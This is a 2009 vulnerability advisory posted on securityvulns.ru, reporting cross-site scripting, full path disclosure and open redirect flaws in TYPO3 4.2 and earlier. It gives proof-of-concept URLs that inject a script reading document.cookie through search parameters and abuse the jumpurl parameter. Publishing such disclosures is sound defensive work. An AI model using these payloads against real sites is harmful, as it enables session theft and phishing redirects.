Computer Security

Security Advisory: Vulnerabilities in TYPO3
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection

  [InterN0T] Google Analytics plugin for Wordpress - XSS Vulnerability

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:04.12.2009
Subject:Vulnerabilities in TYPO3

Hello 3APA3A!

I want to warn you about security vulnerabilities in TYPO3.

These are Cross-Site Scripting, Full path disclosure and Redirector vulnerabilities.

XSS:

http://site/index.
php?id=49&sword=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/nc/search-result/start/1.
html?tx_ttproducts_pi1%5Bsword%5D=%22%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

Full path disclosure:

http://site/index.php?jumpurl=%0A1

Redirector:

http://site/index.php?jumpurl=http://websecurity.com.ua

Vulnerable are TYPO3 4.2 and previous versions.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/3558/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server